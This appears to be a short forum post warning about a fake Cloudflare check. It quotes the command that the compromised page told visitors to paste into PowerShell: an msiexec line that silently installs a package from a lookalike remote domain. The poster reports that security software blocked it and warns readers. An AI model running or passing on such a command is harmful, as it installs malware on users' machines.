After the Cloudflare box comes up open powershell and paste to the prompt. Should look something like this:
msiexec /i "https://cloudfrontenterprise.com/get/std?sid=1787733988550-y50f32yt" /qn
this will validate the cloudflare however my security software blocked whatever it was attempting to install.
Looks like they have been hacked, any site that asks you to download and run something should be considered malicious. Be careful.
